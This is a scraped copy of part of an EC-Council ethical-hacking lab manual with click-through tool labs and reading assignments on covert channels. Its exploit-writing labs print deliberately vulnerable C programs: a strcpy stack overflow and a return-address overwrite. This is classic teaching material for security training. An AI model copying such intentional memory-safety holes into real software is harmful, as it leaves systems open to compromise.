101
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council Page | 633 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited. Module 26 Penetration Testing

CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

  • Upload
    others

  • View
    8

  • Download
    0

Embed Size (px)

Citation preview

Page 1: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 633 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 26

Penetration Testing

Page 2: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 634 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-01

Objective:

Use Azure Web Log to know details about your web traffic

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and Launch Azure Web Log

� Start a New Project from Project -> New. Enter the data and click Ok

Page 3: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 635 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Start a New Log File from File -> Add Log

Page 4: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 636 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Hits and Refs

� Click Site Info

Page 5: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 637 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Current Month

� Click Previous Month

Page 6: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 638 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Year Hits

� Click Hour

Page 7: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 639 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click System

� Country

Page 8: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 640 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-02

Objective:

Use iInventory to capture hardware & software inventory and registry keys without having to leave your desk.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and launch iInventory

� Click button Audit this PC in the left side pane. To start performance audit

Page 9: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 641 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Performance Audit Report

� Click Scan Network button on the left side pane.

Page 10: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 642 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Agent Builder Wizard on the left pane

� Set the options and click Next to forward to the next step

� Click Show Agent Config button on the left side pane

� Select an agent file from the list to display its summary

Page 11: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 643 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 12: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 644 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Summary of agent configuration

Page 13: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 645 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-03

Objective:

Use Link Utility to check links on Web sites and sustaining their efficiency.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and launch Link Utility

� Click New Project button

Page 14: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 646 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Import from HTML File. Select a file to import site addresses from. Click Ok

Page 15: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 647 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Settings button to change the present options

Page 16: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 648 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Scan button. Click Yes

Page 17: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 649 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 18: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 650 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click on the Report to generate the report file

Page 19: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 651 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-04

Objective:

Use MaxCrypt to perform automated computer encryption.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and launch MaxCrypt

� Click on New User to create a New User

� Now Login

Page 20: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 652 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

� Click on Manage Volumes

Page 21: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 653 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click on Create Volume button to create a new volume

� Enter the data and click Create Volume

Page 22: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 654 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� The New Volume F:\ is created

Page 23: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 655 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

� Click on Conceal Files

Page 24: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 656 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select a file and click Add button

Page 25: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 657 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Finally Logout user

Lab 26-05

Objective:

Use Sniffem for monitoring network and capturing data traffic.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and launch Sniffem

Page 26: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 658 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 27: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 659 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Click Settings button to modify the present settings

� Click Capture button to start capturing the activities

� Click Stop button to stop capturing

Page 28: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 660 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-06

Objective:

Use SQL Stripes to monitor and control your SQL Servers.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and Launch SQL Stripes

� Click Yes

Page 29: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 661 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select Settings to modify the present options

Page 30: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 662 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server

� Enter details and click OK to create a new server

Page 31: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 663 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Server 1 Created

� Check the Console

Page 32: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 664 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-07

Objective:

Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination.

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and launch TraceRoute

� Input URL www.juggyboy.com in the Address bar. Click Trace

Page 33: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 665 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Trace Result

� Repeat the same for other sites

Page 34: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 666 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-08

Objective:

Use Windows Security Officer to restrict the resources for an application

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and Launch Windows Security Officer

� Initially click to change the administrator password

Page 35: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 667 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Expand System 10 options in the left side pane

� Select Control Panel to modify the options

Page 36: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 668 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select Shell Restrictions to modify the options

� Select IE Browser Security to modify the options

Page 37: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 669 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 38: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 670 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select IE Cookies Viewer to modify the options

� Select Log User Activity to modify the options

Page 39: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 671 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Select Restrict User Work Time to modify the options

� Select Folder Guard to modify the options

Page 40: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 672 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-09

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Open the Penetration Testing.pdf and read the content Develop a penetration test plan

Page 41: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 673 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 26-10

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Open the Software Penetration Testing.pdf and read the content Penetration testing today

Page 42: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 674 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 27

Covert Hacking

Page 43: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 675 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 27-01

� In the CEHv6 Labs CD-ROM, navigate to Module 27

� Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels

Page 44: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 676 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 27-02

� In the CEHv6 Labs CD-ROM, navigate to Module 27

� Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks)

� In the same PDF file, read the Examples of Covert Channel Attacks topic

Page 45: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 677 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 27-03

� In the CEHv6 Labs CD-ROM, navigate to Module 27

� Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack

Page 46: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 678 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 27-04

� In the CEHv6 Labs CD-ROM, navigate to Module 27

� Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels

Page 47: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 679 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 30

Exploit Writing

Page 48: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 680 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-01

� In the CEHv6 Labs CD-ROM, navigate to Module 30

� Boot your computer using the BackTrack CD-ROM

� Open command shell and type: kedit example1.c

� Type the following in kedi:

void function(int a, int b, int c) {

char buffer1[5];

char buffer2[10];

}

void main() {

function(1,2,3);

}

Page 49: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 681 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Save the program in kedit.

� Compile the program by typing: $ gcc -S -o example1.s example1.c

Page 50: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 682 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� View the generated assembly file by typing: kedit example1.s

Page 51: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 683 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-02

example2.c

� In the CEHv6 Labs CD-ROM, navigate to Module 30

� Create another program in kedit.

Kedit example2.c

� Type the following:

void function(char *str) {

char buffer[16];

strcpy(buffer,str);

}

void main() {

char large_string[256];

int i;

for( i = 0; i < 255; i++)

large_string[i] = 'A';

function(large_string);

}

Page 52: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 684 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Save the program in kedit.

Page 53: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 685 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Compile the program by typing: $ gcc -o example2.s example2.c

Page 54: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 686 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Run the program by typing: ./example2.s

Page 55: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 687 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� You should see a segmentation fault error

Page 56: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 688 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� View the generated assembly file by typing: kedit example2.asm

Page 57: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 689 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-03

Objective:

example3.c

� In the CEHv6 Labs CD-ROM, navigate to Module 30

� Create another program in kedit. Kedit example3.c

� Type the following: void function(int a, int b, int c) {

char buffer1[5];

char buffer2[10];

int *ret;

ret = buffer1 + 12;

(*ret) += 8;

}

void main() {

int x;

x = 0;

function(1,2,3);

x = 1;

printf("%d\n",x);

}

Page 58: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 690 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Save the program and compile it by typing: $gcc –o example3 example3.c

Page 59: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 691 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Run the program by typing: $./example3

Page 60: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

